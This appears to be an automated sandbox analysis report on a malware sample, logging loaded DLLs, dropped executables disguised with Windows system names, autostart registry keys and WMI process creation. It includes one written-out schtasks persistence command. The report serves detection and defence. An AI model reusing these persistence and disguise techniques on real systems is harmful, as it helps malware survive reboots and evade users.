Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\dllhost.exe			Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\5940a34987c991			Jump to behavior

Source: 4t8f8F3uT1.exe

Static file information: File size 2112237 > 1048576

Source: 4t8f8F3uT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 4t8f8F3uT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 4t8f8F3uT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 4t8f8F3uT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 4t8f8F3uT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 4t8f8F3uT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 4t8f8F3uT1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 4t8f8F3uT1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4t8f8F3uT1.exe
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.pdb source: ComwebDriverbroker.exe, 00000005.00000002.2229743508.00000000039FE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.pdb source: ComwebDriverbroker.exe, 00000005.00000002.2229743508.00000000039FE000.00000004.00000800.00020000.00000000.sdmp

Source: 4t8f8F3uT1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 4t8f8F3uT1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 4t8f8F3uT1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 4t8f8F3uT1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 4t8f8F3uT1.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline"
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.cmdline"
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline"	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

File created: C:\portcomSurrogateRefSession\__tmp_rar_sfx_access_check_6592062

Jump to behavior

Source: 4t8f8F3uT1.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006AD42B push 00000000h; retf	0_2_006AD42F
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006AF640 push ecx; ret	0_2_006AF653
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	Code function: 0_2_006AEB78 push eax; ret	0_2_006AEB96
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Code function: 5_2_00007FFD348A534D pushfd ; ret	5_2_00007FFD348A5359
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Code function: 5_2_00007FFD348A539F push eax; ret	5_2_00007FFD348A53A5
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Code function: 5_2_00007FFD348A4BA1 push ecx; retf	5_2_00007FFD348A4BA4
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Code function: 5_2_00007FFD348A53D9 push ss; ret	5_2_00007FFD348A53DF
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Code function: 5_2_00007FFD34A05CB5 push ebp; iretd	5_2_00007FFD34A05CB8
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Code function: 5_2_00007FFD34D0C95B pushfd ; iretd	5_2_00007FFD34D0C982
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Code function: 5_2_00007FFD34D13323 push eax; iretd	5_2_00007FFD34D13331
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFD3477D2A5 pushad ; iretd	39_2_00007FFD3477D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFD348919BB pushad ; ret	39_2_00007FFD348919C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFD34962316 push 8B485F94h; iretd	39_2_00007FFD3496231B

Source: ComwebDriverbroker.exe.0.dr	Static PE information: section name: .text entropy: 7.488807686016316
Source: SIUNRHqHRVexch.exe.5.dr	Static PE information: section name: .text entropy: 7.488807686016316
Source: SIUNRHqHRVexch.exe0.5.dr	Static PE information: section name: .text entropy: 7.488807686016316
Source: Idle.exe.5.dr	Static PE information: section name: .text entropy: 7.488807686016316
Source: smss.exe.5.dr	Static PE information: section name: .text entropy: 7.488807686016316
Source: dllhost.exe.5.dr	Static PE information: section name: .text entropy: 7.488807686016316

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe

File created: C:\Users\Default\Pictures\smss.exe

Jump to dropped file

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Users\user\Desktop\ubytutlp.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\4t8f8F3uT1.exe	File created: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Users\Default\Pictures\smss.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Program Files\Windows Security\BrowserCore\dllhost.exe	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Users\user\Desktop\aRvfEXBg.log	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Users\user\Desktop\IxkHGSFL.log	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Users\user\Desktop\aRvfEXBg.log	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Users\user\Desktop\ubytutlp.log	Jump to dropped file
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	File created: C:\Users\user\Desktop\IxkHGSFL.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch "C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe"

Jump to behavior

Creates multiple autostart registry keys

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComwebDriverbroker	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\dllhost.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Pictures\smss.exe'" /f

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComwebDriverbroker	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ComwebDriverbroker	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SIUNRHqHRVexch	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
